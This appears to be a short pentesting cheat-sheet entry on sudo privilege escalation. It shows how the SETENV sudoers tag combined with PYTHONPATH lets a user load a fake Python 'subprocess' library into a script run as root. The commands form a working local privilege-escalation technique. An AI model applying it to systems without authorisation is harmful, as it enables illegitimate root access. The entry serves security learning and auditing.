#### SUDO #### ********** Escape CMD ********** | https://gtfobins.github.io/#+sudo ****** SETENV ****** | sudo SETENV provide ability to set environment vars in sudo command .. code-block:: bash # ALL=(ALL:ALL) /bin/su $ sudo K=1 su sudo: sorry, you are not allowed to set the following environment variables: K # ALL=(ALL:ALL) SETENV: /bin/su $ sudo K=1 su root@host:/# echo $K 1 | Combined with PYTHONPATH environment variable, SETENV let you hijack python libraries, | consider the following python3 script and user exploitation: .. code-block:: bash # Legitimate script example echo '#!/usr/bin/python3 import subprocess subprocess.run(["whoami"])'>legit.py # Expected Usage $ sudo python3 legit.py root # Create malicious subprocess library echo ' def run(_): print("EVIL") '>/tmp/subprocess.py # Run with fake library path $ sudo PYTHONPATH=/tmp/ python3 legit.py EVIL